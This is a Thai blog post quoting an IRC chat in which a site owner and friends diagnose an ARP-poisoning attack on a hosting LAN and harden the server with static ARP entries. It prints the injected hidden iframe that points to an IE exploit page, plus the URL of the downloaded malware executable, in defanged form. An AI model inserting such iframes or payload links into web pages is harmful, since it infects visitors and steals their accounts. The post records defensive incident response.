Monthly Archives: January 2011

วันนี้มีคนใช้เทคนิค ARP Poisoning ในวง LAN (แฮกตูอีกแล้ว -.- )

0
Posted by windows98SE on 28/01/2011 – 11:03 pm
Filed under เรื่อยเปื่อย บ่นๆ ไร้สาระมั่ง ไม่ไร้สาระมั่ง

วันนี้ มีคนใช้เทคนิค ARP Poisoning ในวง LAN อีกแล้ว T_T

เรื่อง คือ ผมหลับอยู่ แล้วเพิ่งตื่น ตอน 2 ทุ่ม พอมา ดู msn มีคนทักมาว่า Teamspeak Server 3 ที่เปิดอยู่ Lag
ผมก็คิดในใจน่าจะโดน ddos ซึ่งสงสัยเพราะ โปรเจค piratepeer.com ตูเพิ่งทำเสร็จ สดๆ 1 วัน คงโดนนักเลง ตีหัวกลับซะแล้ว
หรือไม่ก็ พวกใน ts2, ts3 ไปเกรียน (อ้างชื่อผมไปเกรียนใส่ชาวบ้าน ประมาณนั้น) แล้ว โดนพวกไล่ยิงเครื่อง sv กลับมา

ซักพัก ป๋า sleepya ก็ถามมาว่า login ssh ได้เปล่า …. อืม จากการลอง มันก็เข้าได้อยู่ แต่ ช้ามาก (ก็มัน ping สูงซะขนาดนั้น – -”)

ก็เลยลองโพสถาม เจ้าปิง ใน facebook
วินโด้ เก้าแปดเอสอี : หนุ่มๆ ถ้าเครื่อง อืดๆเหมือนโดนยิง นี่จะเช็คไงได้มั่งอ่ะ (เห็นว่า อืดมาตั้งแต่ 6 โมงแล้ว)
Pingz : ไอ้เอ็มบอกว่า มันเป็น ARP Poisoning ให้แก้โดย พิมพ์ # arp -s 210.1.61.254 00:00:0C:07:AC:F7

ซักพักป๋า Det3ct1v3 กะ sleepya มา ก็เลย chat ใน iRC ยาว


[20:55] [Det3ct1v3] โดนอะไรแน่อ่ะ
[20:55] [Det3ct1v3] brute force ssh
[20:55] [sleepya] ถ้าคิดว่าโดน arp poison ให้ดู arp table
[20:55] [Det3ct1v3] หรือว่าอย่างอื่นครับเล็ก
[20:56] [sleepya] คำสั่งไรนะป๋า จำ argument ไม่ได้
[20:56] [@windows98SE] ไม่คิดว่าจะเป็น brute force ssh นะ
[20:56] [@windows98SE] เพราะ ผม เตะ แบน ip คนที่ login ผิด 3 ครั้งหมดอ่ะ
[20:56] [sleepya] arp -an ดู
[20:56] [Det3ct1v3] SYN Flood attacks?
[20:57] [@windows98SE] Pinging www.stephack.com [210.1.61.196] with 32 bytes of data:
[20:57] [@windows98SE] Reply from 210.1.61.196: bytes=32 time=807ms TTL=50
[20:57] [@windows98SE] Reply from 210.1.61.196: bytes=32 time=57ms TTL=50
[20:57] [@windows98SE] Request timed out.
[20:57] [@windows98SE] Reply from 210.1.61.196: bytes=32 time=47ms TTL=50
[20:57] [@windows98SE] Reply from 210.1.61.196: bytes=32 time=146ms TTL=50
[20:57] [@windows98SE] Reply from 210.1.61.196: bytes=32 time=46ms TTL=50
[20:57] [@windows98SE] Request timed out.
[20:57] [@windows98SE] Request timed out.
[20:57] [@windows98SE] Reply from 210.1.61.196: bytes=32 time=47ms TTL=50
[20:57] [@windows98SE] Reply from 210.1.61.196: bytes=32 time=47ms TTL=50
[20:57] [sleepya] แล้ว cpu อะ
[20:57] [sleepya] ลอง uptime ดูยัง
[20:57] [sleepya] load เป็นยังไง
[20:58] [@windows98SE] CPU load averages 0.51 (1 min) 1.10 (5 mins) 1.19 (15 mins)
[20:58] [Det3ct1v3] Web Server?
[20:58] [@windows98SE] -sh-3.2$ uptime
[20:58] [@windows98SE] 20:59:03 up 5 days, 19:01, 1 user, load average: 0.31, 0.85, 1.09
[20:58] [Det3ct1v3] netstat -tuna | grep :80 | grep SYN_RECV
[20:58] [@windows98SE] -sh-3.2$ arp -an
[20:58] [@windows98SE] -sh: arp: command not found
[20:59] [@windows98SE] -sh-3.2$ netstat -tuna | grep :80 | grep SYN_RECV
[20:59] [@windows98SE] tcp 0 0 210.1.61.196:80 125.26.163.93:52280 SYN_RECV
[20:59] [@windows98SE] tcp 0 0 210.1.61.196:80 125.26.163.93:52279 SYN_RECV
[20:59] [@windows98SE] tcp 0 0 210.1.61.196:80 125.26.163.93:52278 SYN_RECV
[20:59] [@windows98SE] tcp 0 0 210.1.61.196:80 113.53.193.10:3008 SYN_RECV
[20:59] [@windows98SE] tcp 0 0 210.1.61.196:80 113.53.193.10:3009 SYN_RECV
[20:59] [Det3ct1v3] เหอๆๆ
[20:59] [sleepya] แค่นี้หรอ
[20:59] [@windows98SE] เอ๋
[20:59] [Det3ct1v3] SYN Flood attacks?
[20:59] [@windows98SE] มียัด ifram
[20:59] [@windows98SE] iframe src= hxxp://110.252.83.194/ie.htm width=0 height=0
[20:59] [sleepya] แค่นี้ไม่ใช่ syn flood
[21:00] [sleepya] แค่นี้เศษเสี้ยว
[21:00] [@windows98SE] เดี๋ยวนะ
[21:00] [sleepya] แค่ load เยอะอยู่น่า
[21:00] [Det3ct1v3] ไล่ให้หมดอาะ
[21:00] [@windows98SE] มันยัด iframe มาใน file ผม ที่เวป opkwin ได้ไง
[21:00] [sleepya] 1.09
[21:00] [@windows98SE] งานเข้าแระ
[21:00] [ICheer_No0M] iframe เมือ่กี้งับ js/exploit.agent ,, ess32
[21:00] [sleepya] ฮ่าๆ
[21:01] [Det3ct1v3] โดนลองของ
[21:02] [sleepya] netstat -ant | grep ESTABLI | grep -v 210.1.61.196:80
[21:02] [sleepya] ลองดูมี connection ไหนบ้างที่ไม่ใช่ web
[21:02] [@windows98SE] -sh-3.2$ netstat -ant | grep ESTABLI | grep -v 210.1.61.196:80
[21:02] [@windows98SE] tcp 0 0 210.1.61.196:1212 124.122.217.64:4403 ESTABLISHED
[21:02] [@windows98SE] tcp 0 0 210.1.61.196:1212 110.168.41.201:2572 ESTABLISHED
[21:02] [@windows98SE] tcp 0 0 210.1.61.196:1212 110.168.41.201:2568 ESTABLISHED
[21:02] [@windows98SE] tcp 0 0 210.1.61.196:1212 110.168.41.201:2423 ESTABLISHED
[21:02] [@windows98SE] tcp 0 52 ::ffff:210.1.61.196:22 ::ffff:118.173.43.241:51209 ESTABLISHED
[21:02] [@windows98SE] tcp 0 0 ::ffff:210.1.61.196:21 ::ffff:118.173.43.241:51236 ESTABLISHED
[21:03] [@azazel] + *-* ^^
[21:04] [sleepya] ป๋า คำสั่ง ps อะ
[21:04] [sleepya] ใส่ option อะไรบ้าง
[21:04] [sleepya] จะดู cpu time
[21:04] [@windows98SE] last modified
[21:04] [@windows98SE] ใน opkwin โดนแก้ 4 file แฮะ
[21:05] [Det3ct1v3] หืมมม
[21:05] [Det3ct1v3] ไม่ได้แก้ไขเอง?
[21:05] [X-c0d3-D3V] ตาเล็กโดนของหรอ
[21:05] [@windows98SE] เอ๊ะ
[21:05] [@windows98SE] file ที่ โดน ยัด iframe
[21:06] [@windows98SE] ใน file php ไม่มี นะ
[21:06] [@windows98SE] ดูผิด ไม่ได้โดนแก้
[21:07] [@windows98SE] เดี๋ยวนะ แปลกๆ แระ
[21:07] [@windows98SE] file sqlxxxxxxxxx.php ใน code ไม่มี iframe แก้ล่าสุด 29/10/53 น่าจะผมแก้
[21:07] [@windows98SE] แต่เวลาเปิดกับ firefox เจอ iframe ซะงั้น
[21:08] [sleepya] ดูที่ include ยัง
[21:09] [@windows98SE] ลอง arp -s 210.1.61.254 00:00:0C:07:AC:F7 ดู หายแฮะ
[21:09] [@windows98SE] Reply from 210.1.61.196: bytes=32 time=46ms TTL=50
[21:09] [@windows98SE] Reply from 210.1.61.196: bytes=32 time=47ms TTL=50
[21:09] [@windows98SE] Reply from 210.1.61.196: bytes=32 time=45ms TTL=50
[21:09] [@windows98SE] Reply from 210.1.61.196: bytes=32 time=45ms TTL=50
[21:09] [@windows98SE] Reply from 210.1.61.196: bytes=32 time=45ms TTL=50
[21:10] [@windows98SE] Request timed out.
[21:10] [@windows98SE] Reply from 210.1.61.196: bytes=32 time=45ms TTL=50
[21:12] [@windows98SE] แต่ timeout ยังอยุ่นะ
[21:14] [sleepya] ถ้าที่บอกว่าโดน iframe จาก firefox
[21:14] [sleepya] แล้วไฟล์ php ไม่มีแก้
[21:15] [sleepya] ก็น่าจะโดน inject
[21:15] [Det3ct1v3] sniff ดูก่อนอย่าง sleepya ว่า
[21:16] [sleepya] น่าน เปิดดูลิงค์ของ iframe แล้ว
[21:16] [sleepya] exploit ยิง ie
[21:17] [sleepya] แสดงว่ากะสอย user ที่ใช้งานเว็บ
[21:19] [@windows98SE] Country Name: CN - China
[21:19] [@windows98SE] Reverse Lookup: 110.252.83.194
[21:21] [@windows98SE] [root@stephack ~]# arp -an
[21:21] [@windows98SE] ? (210.1.61.254) at 00:00:0C:07:AC:F7 [ether] on eth0
[21:21] [sleepya] เลิกแล้วหรือเปล่า
[21:24] [@windows98SE] Pingz : เรารู้แค่ว่า มันมาจาก IP *.61.145 ซึ่งเป็นคนนอกตู้อ่ะ
[21:24] [@windows98SE] -.-
[21:24] [@windows98SE] hxxp://210.1.61.145/
[21:24] [sleepya] เดี๋ยวทำ re ให้
[21:27] [Det3ct1v3] ซักวันเราก็คงโดนมั่ง
[21:27] [Det3ct1v3] อิอิอิ
[21:28] [sleepya] แกะยาก
[21:28] [sleepya] ลอง run มันดูใน vmware ดีกว่า
[21:29] [sleepya] กำลังนั่งเขียน exploit อยู่เลย
[21:29] [@windows98SE] -.-
[21:38] [sleepya] hxxp://110.252.83.194/tc.exe
[21:39] [sleepya] exploit มันไปโหลดไฟล์นี้
[21:39] [sleepya] มา run
[21:40] [sleepya] มันต่อไปที่จีนหมดเลยนี่หว่า
[21:40] [sleepya] เล็กไปสร้างความแค้นอะไรกับคนจีนอะ
[21:44] [sleepya] ลืมบอกไปว่า ห้ามรันนะ ไฟล์ exe อะ
[21:45] [sleepya] รันปุ๊บ
[21:45] [sleepya] มี process ชื่อแปลกออกมา
[21:45] [sleepya] และไฟล์มันก็หายไป
[21:45] [sleepya] แล้วก็มี connection ออกจากเราเยอะแยะ
[21:46] [sleepya] เป็นไฟล์ดี
[21:46] [sleepya] เล็กตกลง server หายยังอะ
[21:47] [Det3ct1v3] มี GetAccountInfomation ด้วยแฮะ
[21:48] [sleepya] อ่า มันได้ account ผมไปแล้ว
[21:48] [sleepya] ม่ายยยยย
[21:49] [Det3ct1v3] รันใน vm ไใาใช่รึ
[21:49] [Det3ct1v3] :P
[21:49] [sleepya] ฮ่าๆๆ
[21:49] [sleepya] ก็ user ใน vmware ผมอะ
[21:50] [sleepya] ตั้งชื่อเป็น user ไม่มี password
[21:50] [sleepya] โดยขโมยไปแล้ว
[21:51] [sleepya] ไม่รู้ซิ
[21:54] [Det3ct1v3] hxxp://image.ohozaa.com/i/203/terminal_012.png อะไรก็ไม่รู้เยอะแยะไปหมด
[21:54] [Det3ct1v3] ดูไม่รู้เรื่อง
[21:54] [Det3ct1v3] :P
[21:55] [sleepya] อิอิ เปิด IDA เหมือนกันเลย
[21:55] [sleepya] ตรงนั้นมัน import table นิ
[21:55] [sleepya] แต่ละ function ดีๆ ทั้งนั้น
[21:58] [sleepya] เอาเป็นว่าถ้าอยากรู้ reverse ยาวอะ
[22:00] [Det3ct1v3] sleepya> เอาเป็นว่าถ้าอยากรู้ reverse ยาวอะ <-- รอ report อยู่นะ รีบๆทำ re
[22:00] [sleepya] ผมไม่ถนัด re
[22:01] [sleepya] เอาไปให้ edkung ดีกว่า
[22:01] [sleepya] จริงๆ ใช้ sandbox diff น่าจะช่วยได้เยอะ
[22:05] [sleepya] hxxp://www.virustotal.com/file-scan/report.html?id=a48107c2458ec84268c81af5937d0fcf51fd2349904cab4e1aa0fa4eddd1b747-1296227040
[22:05] [sleepya] ผล scan
[22:06] [sleepya] เจอกันเยอะนะ
[22:06] [sleepya] แต่ ClamAV, Kaspersky, TrendMicro, Symantec ไม่เจอ
[22:09] [@windows98SE] [21:46] [sleepya] เล็กตกลง server หายยังอะ --- เรื่อง arp sproff หายแย้ว
[22:09] [@windows98SE] แต่ เรื่อง ifram มาได้ไง ยังหาสาเหตุมะเจอ
[22:09] [@windows98SE] T_T
[22:11] [sleepya] ถ้าโดน arp spoof อะ
[22:11] [sleepya] เป็นไปได้
[22:11] [sleepya] จำได้ไม่ว่า ที่ผมบอกว่า จะเป็น redirect packet มาที่เครื่อง sniff ก่อน
[22:11] [@windows98SE] หมายถึง มากับ arp spoof ?
[22:12] [sleepya] จริงๆ แล้วไม่จำเป็นต้องทำแค่ sniff
[22:12] [sleepya] ใช่
[22:12] [@windows98SE] สามารถแก้ content ได้ด้วย ?
[22:12] [sleepya] รับมาแล้ว จะเปลี่ยนเป็นอะไรก็ได้
[22:12] [@windows98SE] สามารถแก้ content ของ webpage ได้ด้วย ?
[22:12] [sleepya] แม่นแล้ว
[22:12] [@windows98SE] อ๋อ
[22:12] [@windows98SE] มิน่า
[22:12] [@windows98SE] มันมา บรรทัดแรกของ file เลย
[22:12] [sleepya] ถ้าเป็นพวก ssh จะแก้ไม่ได้
[22:13] [sleepya] ผมว่านะ
[22:13] [sleepya] เครื่องที่ทำ arp spoof อะ
[22:13] [sleepya] โดน hack
[22:14] [sleepya] เป็นตัวอย่างที่ดี
[22:14] [sleepya] สำหรับการ hack client ใน lan
[22:14] [sleepya] และทำไมต้อง update browser

จบ แบบนี้ พอ แล้วกัน *0*